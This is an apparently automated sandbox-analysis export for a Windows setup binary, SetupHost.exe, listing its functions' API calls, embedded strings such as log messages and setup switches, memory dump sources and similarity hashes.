54d872-54d878 1305->1307 1311 54d86a-54d870 1306->1311 1312 54d76a-54d777 call 4f9d84 1306->1312 1309 54d87e-54d888 1307->1309 1309->1252 1311->1309 1312->1252
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_Versionmemset
                                                                                                                        • String ID: %sCore$Business$BusinessN$EditionId$HomePremium$Professional$ProfessionalN$Server Core$ServerComputeCluster$ServerDatacenter$ServerEnterprise$ServerHPC$ServerStandard$ServerWeb$Software\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 1577575235-3437204702
                                                                                                                        • Opcode ID: dc36d7716912f88b4fa1e1c5cb684a35037d5f6ed23ec405c36e0e7021e98d33
                                                                                                                        • Instruction ID: fa1060cce841dcb120314513e85f7dc4f5efc289916c73d1158b77c5083e888b
                                                                                                                        • Opcode Fuzzy Hash: dc36d7716912f88b4fa1e1c5cb684a35037d5f6ed23ec405c36e0e7021e98d33
                                                                                                                        • Instruction Fuzzy Hash: 2F61E270E003199BDF249B648D95BFDBAB4BF4431CF1045AEE609A7281CBB45E84CB64

                                                                                                                        Control-flow Graph

                                                                                                                        • Control-flow graph for the function at 0054D8F8 (rendering not preserved in this export; Windows API call visible in the graph nodes: CompareStringW)
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0054D8FF
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,00000000,00000000,Server Core,00000000), ref: 0054DAB4
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,00000000,00000000,Server,00000000), ref: 0054DAD3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CompareString$H_prolog3
                                                                                                                        • String ID: Client$Complete$Core$HomeBasic$HomeBasicN$HomePremium$HomePremiumN$Server$Server Core$Starter$StarterN$Unknown
                                                                                                                        • API String ID: 2184196538-3738757907
                                                                                                                        • Opcode ID: 3a348150cd5cc4669ed872027002f01fa7af3fbf2acb0f07e41f880957d9aee7
                                                                                                                        • Instruction ID: 74a647aa6bbc358037e1eee2b3e8bfddb44485393fe181979bcd2577f7a0d705
                                                                                                                        • Opcode Fuzzy Hash: 3a348150cd5cc4669ed872027002f01fa7af3fbf2acb0f07e41f880957d9aee7
                                                                                                                        • Instruction Fuzzy Hash: F651D5706443096BEF14AA658CAAFBE3E39FB61B0DF100519B201AB2D1CBB58D04D764

                                                                                                                        Control-flow Graph

                                                                                                                        • Control-flow graph for the function at 004EAA1D (rendering not preserved in this export; the graph nodes show only calls to internal subroutines, no direct Windows API calls)
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EAA24
                                                                                                                          • Part of subcall function 004EA87F: __EH_prolog3.LIBCMT ref: 004EA886
                                                                                                                          • Part of subcall function 004F9B21: GetProcessHeap.KERNEL32(00000000,?,004E7D2F), ref: 004F9B2B
                                                                                                                          • Part of subcall function 004F9B21: HeapFree.KERNEL32(00000000), ref: 004F9B32
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3Heap$FreeProcess
                                                                                                                        • String ID: /AzureHost$/Boot$/ClientId %s$/CopyLogs "%s"$/ExpressPackage$/FlightData %s$/Media$/Package$/Quiet$/Recovery$/ReportId %s$/RollbackSys$/RollbackUser$/RunRollbackScript$/Success$/Update$CSetupHost::CreatePostRebootArgs$SetupHost: Unexpected scenario - defaulting postoobe/rollback commands!$W
                                                                                                                        • API String ID: 2588364637-2629692655
                                                                                                                        • Opcode ID: ed4b61988a26ccaaadd945c1eb046d1a045ed8b369ec54b425ea6d7731d5ff05
                                                                                                                        • Instruction ID: f913f17db20662be1166d779892989a12a2214625351bdbb553d04b51b31d46a
                                                                                                                        • Opcode Fuzzy Hash: ed4b61988a26ccaaadd945c1eb046d1a045ed8b369ec54b425ea6d7731d5ff05
                                                                                                                        • Instruction Fuzzy Hash: C4024070B0025A9BDF15DFA6C891BBE77B5AF44706F10402BE901EB381E778BD118B5A

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,00000000), ref: 0053DADD
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 0053DB2A
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0053DAEB
                                                                                                                          • Part of subcall function 0054086C: GetLastError.KERNEL32(<unnamed>,?,00000000), ref: 005408BE
                                                                                                                          • Part of subcall function 0054086C: memset.MSVCRT ref: 005408E3
                                                                                                                          • Part of subcall function 0054086C: GetProcessHeap.KERNEL32(00000000,?), ref: 0054092F
                                                                                                                          • Part of subcall function 0054086C: HeapAlloc.KERNEL32(00000000), ref: 00540936
                                                                                                                          • Part of subcall function 0054086C: wcsrchr.MSVCRT ref: 0054099E
                                                                                                                        • memset.MSVCRT ref: 0053DB44
                                                                                                                        • RegQueryValueExW.KERNEL32(?,CSDBuildNumber,00000000,?,?,00000206,?,00000000), ref: 0053DB77
                                                                                                                        • RegCloseKey.KERNEL32(?,?,00000000), ref: 0053DB85
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0053DBA0
                                                                                                                        Strings
                                                                                                                        • CSDBuildNumber, xrefs: 0053DB6C
                                                                                                                        • %hs: Failed to read 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber'. Error = %d, xrefs: 0053DC0C
                                                                                                                        • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 0053DAFA, 0053DBAF, 0053DBFB, 0053DC49
                                                                                                                        • %hs: Failed to open 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'. Error = %d, xrefs: 0053DB0B
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0053DAD1
                                                                                                                        • pGetHostCSDBuildNumber, xrefs: 0053DB06, 0053DBBA, 0053DC07, 0053DC54
                                                                                                                        • %hs: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber' does not exist. Assume 0, xrefs: 0053DBBF
                                                                                                                        • %hs: Registry value 'CSDBuildNumber' is not the correct type (REG_SZ)., xrefs: 0053DC59
                                                                                                                        • pGetHostCSDBuildNumber, xrefs: 0053DAF5, 0053DBAA, 0053DBF6, 0053DC44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heapmemset$AllocCloseOpenProcessQueryValuewcsrchr
                                                                                                                        • String ID: %hs: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber' does not exist. Assume 0$%hs: Failed to open 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion'. Error = %d$%hs: Failed to read 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber'. Error = %d$%hs: Registry value 'CSDBuildNumber' is not the correct type (REG_SZ).$CSDBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion$base\ntsetup\conx\common\setuplib\src\osinfo.cpp$pGetHostCSDBuildNumber$pGetHostCSDBuildNumber
                                                                                                                        • API String ID: 3006269326-936426326
                                                                                                                        • Opcode ID: 7acdd3fd1344b1d69c1b1a50dde4a7d1a94d6d81e882dccfc3d653c5c2d0cf80
                                                                                                                        • Instruction ID: 3f6b739779377b9201bd1af4c9f9e91a674bd0646917bb071bac4f0e6fe4b3e9
                                                                                                                        • Opcode Fuzzy Hash: 7acdd3fd1344b1d69c1b1a50dde4a7d1a94d6d81e882dccfc3d653c5c2d0cf80
                                                                                                                        • Instruction Fuzzy Hash: CF41E77168431CBEDB106B60BC6EFEB3B6CEB24706F204466F505E6282C9B48D019A74

                                                                                                                        Control-flow Graph

                                                                                                                        • Control-flow graph for the function at 004E2F00 (rendering not preserved in this export; Windows API calls visible in the graph nodes: GetProcessHeap, HeapAlloc, UuidCreate, memset, HeapFree)
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000090), ref: 004E2F44
• HeapAlloc.KERNEL32(00000000), ref: 004E2F4B
• UuidCreate.RPCRT4(?), ref: 004E2F6F
  • Part of subcall function 004FCD57: memset.MSVCRT ref: 004FCD9B
• GetProcessHeap.KERNEL32(00000000,00000000,?,CorrelationVector,?), ref: 004E3091
• HeapFree.KERNEL32(00000000), ref: 004E3098
• memset.MSVCRT ref: 004E30BC
• memset.MSVCRT ref: 004E30E1
  • Part of subcall function 004F986B: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000081,?,004E3143,?,?,?), ref: 004F995F
  • Part of subcall function 004F986B: HeapFree.KERNEL32(00000000,?,004E3143,?,?,?), ref: 004F9966
  • Part of subcall function 004EEE5D: GetProcessHeap.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,004FB3D8,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004EEE6B
  • Part of subcall function 004EEE5D: HeapFree.KERNEL32(00000000), ref: 004EEE72
• GetProcessHeap.KERNEL32(00000000,?), ref: 004E31FE
• HeapFree.KERNEL32(00000000), ref: 004E3205
• GetProcessHeap.KERNEL32(00000000,?), ref: 004E3215
• HeapFree.KERNEL32(00000000), ref: 004E321C
• GetProcessHeap.KERNEL32(00000000,?), ref: 004E322C
• HeapFree.KERNEL32(00000000), ref: 004E3233
• GetProcessHeap.KERNEL32(00000000,?), ref: 004E3243
• HeapFree.KERNEL32(00000000), ref: 004E324A
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E3256
• HeapFree.KERNEL32(00000000), ref: 004E325D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$Free$memset$AllocCreateUuid
• String ID: CorrelationVector$SYSTEM\Setup\MoSetup
• API String ID: 858379666-2351024219
• Opcode ID: 77510b38390af33a1a97f21331bc8bd46ceb3793d53e2838af10e129f8220e8b
• Instruction ID: 3929af2ecd6177a942f84fef82e280d6d2e73038fa0d8849c2b63620a4d76d68
• Opcode Fuzzy Hash: 77510b38390af33a1a97f21331bc8bd46ceb3793d53e2838af10e129f8220e8b
• Instruction Fuzzy Hash: BAA1B6716083419BC711EF76D899B2FB7E8AFD8706F00092EF94587251DB78DA088B96
APIs
• GetLastError.KERNEL32(<unnamed>,?,00000000), ref: 005408BE
• memset.MSVCRT ref: 005408E3
• GetProcessHeap.KERNEL32(00000000,?), ref: 0054092F
• HeapAlloc.KERNEL32(00000000), ref: 00540936
• wcsrchr.MSVCRT ref: 0054099E
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 00540A37
• HeapFree.KERNEL32(00000000,?,?), ref: 00540A3E
• TlsGetValue.KERNEL32(?,?), ref: 00540A4A
• GetCurrentThreadId.KERNEL32 ref: 00540A98
• GetProcessHeap.KERNEL32(00000000,?), ref: 00540AE6
• HeapFree.KERNEL32(00000000), ref: 00540AED
• ExitProcess.KERNEL32 ref: 00540AFF
• RaiseException.KERNEL32(C0000025,00000001,00000000,00000000), ref: 00540B17
• SetLastError.KERNEL32(?), ref: 00540B21
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$ErrorFreeLast$AllocCurrentExceptionExitRaiseThreadValuememsetwcsrchr
• String ID: <unknown>$<unnamed>$C:\$Windows.~WS\Sources\SetupHost.Exe$Def$(T
• API String ID: 2945306065-2719663207
• Opcode ID: 3f480d1f98192b52c2fd5b8bfe94a8fb2b9eafd2452ff8ddd88c15c04cb3f12f
• Instruction ID: 7c756117f4d10f6388f998e26725e033998b6abc64823cbaf41811a83983f2ae
• Opcode Fuzzy Hash: 3f480d1f98192b52c2fd5b8bfe94a8fb2b9eafd2452ff8ddd88c15c04cb3f12f
• Instruction Fuzzy Hash: DA81B932604301AFDB109F64DC59BABBBE9FB88719F14491DFA89D72A0D730D904DB92
APIs
• _wfopen.MSVCRT ref: 00547835
• GetProcessHeap.KERNEL32(00000000,00000200), ref: 00547859
• HeapAlloc.KERNEL32(00000000), ref: 00547860
• fgetws.MSVCRT ref: 0054787B
• GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 005478C4
• HeapReAlloc.KERNEL32(00000000), ref: 005478CB
• fgetws.MSVCRT ref: 005478F6
• feof.MSVCRT ref: 00547906
• iswctype.MSVCRT ref: 0054793D
• GetProcessHeap.KERNEL32(00000000,?), ref: 00547968
• HeapFree.KERNEL32(00000000), ref: 0054796F
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0054797B
• HeapFree.KERNEL32(00000000), ref: 00547982
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00547998
• HeapAlloc.KERNEL32(00000000), ref: 0054799F
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 005479AA
• HeapAlloc.KERNEL32(00000000), ref: 005479B1
• swscanf_s.MSVCRT ref: 005479D9
  • Part of subcall function 005475AB: _wcsicmp.MSVCRT ref: 005475DB
  • Part of subcall function 005475AB: _wcsicmp.MSVCRT ref: 00547622
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free_wcsicmpfgetws$_wfopenfeofiswctypeswscanf_s
• String ID: %s %[^]
• API String ID: 1979924226-2460127861
• Opcode ID: 5ef35065991bc72738f7ef94b9e5751db236058d8f9aeb1976e0af83dad94b93
• Instruction ID: 38de0c9ac957d563a65a53cab135f258421fe2d7ec5369bf063f4bcb60d71142
• Opcode Fuzzy Hash: 5ef35065991bc72738f7ef94b9e5751db236058d8f9aeb1976e0af83dad94b93
• Instruction Fuzzy Hash: C7614C71E08309ABCF149FA5EC98AEEBFB9FF5C305F14441AE805E2290D7749905DB60
APIs
• RegCreateKeyExW.KERNEL32(80000002,00000425,00000000,00000000,00000000,000F003F,00000000,?,00000000,00000001,00000000,00000000,?,00000000,00000000,00000000), ref: 00549AC7
• RegCreateKeyExW.KERNEL32(000F003F,00000015,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00549AFC
• RegCreateKeyExW.KERNEL32(00000000,0000021D,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00549B20
• RegSetValueExW.KERNEL32(?,ETag,00000000,00000001,?,00000000), ref: 00549B57
• RegSetValueExW.KERNEL32(?,RefreshInterval,00000000,00000004,0000000D,00000004), ref: 00549B78
• RegDeleteTreeW.ADVAPI32(?,Settings), ref: 00549B90
• RegCreateKeyExW.KERNEL32(?,Settings,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00549BBE
• RegDeleteTreeW.ADVAPI32(?,QueryParameters), ref: 00549BEA
• RegCreateKeyExW.KERNEL32(?,QueryParameters,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 00549C11
• RegCloseKey.ADVAPI32(?), ref: 00549C53
• RegCloseKey.ADVAPI32(?), ref: 00549C61
• RegCloseKey.ADVAPI32(?), ref: 00549C6F
• RegCloseKey.ADVAPI32(?), ref: 00549C7D
• RegCloseKey.ADVAPI32(?), ref: 00549C8B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: CloseCreate$DeleteTreeValue
• String ID: ETag$QueryParameters$RefreshInterval$Settings
• API String ID: 4213054534-3134423153
• Opcode ID: 3b8aad682af26e2dec92b575f70a3ddc4603fcf38380fd935799c57e677e9c87
• Instruction ID: 1492bcd058953f3fe1f44b766ee6dff2b9c76b5ca6317f5f34083060b0e1f723
• Opcode Fuzzy Hash: 3b8aad682af26e2dec92b575f70a3ddc4603fcf38380fd935799c57e677e9c87
• Instruction Fuzzy Hash: EF518F72D0161EFFCB219B94DC96DFFBBBDFB14759B100165F901A6160D7308E009AA0
APIs
• ImpersonateLoggedOnUser.ADVAPI32(00000001,00000001,00000000,00000000,00000001,00000000), ref: 0054906B
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001), ref: 00549075
• WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,00000001,00000000), ref: 005490A4
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005490AE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005490B9
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005490EC
• GlobalFree.KERNEL32(00000000), ref: 0054912B
• GlobalFree.KERNEL32(00000000), ref: 0054913E
• WinHttpGetProxyForUrl.WINHTTP(00000000,00000000,?,?), ref: 00549158
• GlobalFree.KERNEL32(00000000), ref: 005491FB
• GlobalFree.KERNEL32(00000000), ref: 00549211
• WinHttpSetOption.WINHTTP(00000000,00000026,?,0000000C), ref: 0054923C
• GlobalFree.KERNEL32(00000000), ref: 00549296
• GlobalFree.KERNEL32(00000000), ref: 005492A9
• WinHttpGetDefaultProxyConfiguration.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001), ref: 005492B7
• wcsrchr.MSVCRT ref: 0054937D
• RevertToSelf.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005493A8
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 005493B6
• ExitProcess.KERNEL32 ref: 005493BD
  • Part of subcall function 00548F32: WTSGetActiveConsoleSessionId.KERNEL32(?,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00548F42
  • Part of subcall function 00548F32: WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548F63
  • Part of subcall function 00548F32: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00548F79
  • Part of subcall function 00548F32: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 00548F83
  • Part of subcall function 00548F32: CloseHandle.KERNEL32(00000000), ref: 00548FFE
  • Part of subcall function 00548F32: WTSFreeMemory.WTSAPI32(?), ref: 0054900D
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Free$ErrorGlobalLast$Http$ProxyUser$ActiveCloseConfigConfigurationConsoleCurrentDefaultEnumerateExitHandleImpersonateLoggedMemoryOptionProcessQueryRevertSelfSessionSessionsTokenwcsrchr
• String ID:
• API String ID: 1916705276-0
• Opcode ID: 797564fd99ed06d74b681a8525e42d5bfb758780515ac04337b486d0e6256e9c
• Instruction ID: 90380a07d96891d800cb20b749cb77caff605e7ce21ff04aa2d1b8ff9bee9066
• Opcode Fuzzy Hash: 797564fd99ed06d74b681a8525e42d5bfb758780515ac04337b486d0e6256e9c
• Instruction Fuzzy Hash: 97B1E136A0420AABDF259FA4D81A7EFBFB1FF25B59F044424D806E7290E7718D44C7A1
APIs
  • Part of subcall function 00549436: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 00549486
  • Part of subcall function 00549436: HeapAlloc.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054948D
  • Part of subcall function 00549436: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 005494B0
  • Part of subcall function 00549436: HeapFree.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005494B7
• WinHttpSendRequest.WINHTTP(?,00000000,000000FF,00000000,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000), ref: 005494FA
• GetLastError.KERNEL32(?,?,00000000,00000000,00000000), ref: 00549504
• WinHttpReceiveResponse.WINHTTP(?,00000000,?,?,00000000,00000000,00000000), ref: 00549527
• WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 0054954C
                                                                                                                        • WinHttpQueryHeaders.WINHTTP(?,00000036,00000000,00000000,00000004,00000000,?,?,00000000), ref: 00549575
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0054957F
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,?,00000000), ref: 00549593
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0054959A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000), ref: 005496A8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 005496AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$HttpProcess$AllocErrorFreeHeadersLastQuery$ReceiveRequestResponseSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4147306657-0
                                                                                                                        • Opcode ID: cc5b98dbbd51ead1341e401805ae92fc26f4529ab7886b5079ef283c7648280e
                                                                                                                        • Instruction ID: 69f67d5fc7cb07f77184493ca88b34ce59f315afcc80d7fd69aed62138e370f5
                                                                                                                        • Opcode Fuzzy Hash: cc5b98dbbd51ead1341e401805ae92fc26f4529ab7886b5079ef283c7648280e
                                                                                                                        • Instruction Fuzzy Hash: F051817590420AFBEB218BA1DC59BEBBEACBF14316F114565F901E6190D7709E04AB60
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EBAF4
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        • MediaSetupUIMgr.dll, xrefs: 004EBC7E
                                                                                                                        • SetupHost: Automation initialization failed: [0x%X], xrefs: 004EBF90
                                                                                                                        • CSetupHost::InitializeComponents, xrefs: 004EC37E
                                                                                                                        • SetupHost: Automation information initialized., xrefs: 004EBEB4
                                                                                                                        • SetupHost: Automation information not found. Releasing automation object., xrefs: 004EBEE7
                                                                                                                        • SetupHost::InitializeComponents, xrefs: 004EBB30
                                                                                                                        • SetupHost: Loading AutomationManager manager..., xrefs: 004EBD36
                                                                                                                        • SetupHost: Initializing automation..., xrefs: 004EBE4E
                                                                                                                        • SetupHost: Looking for automation file..., xrefs: 004EBDA2
                                                                                                                        • SetupCore.dll, xrefs: 004EBCE4, 004EBD63
                                                                                                                        • SetupHost: Using automation file: [%s]..., xrefs: 004EBE18
                                                                                                                        • SetupHost: OneSettings initialization failed: [0x%X], xrefs: 004EBF4A
                                                                                                                        • SetupMgr.dll, xrefs: 004EBF6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
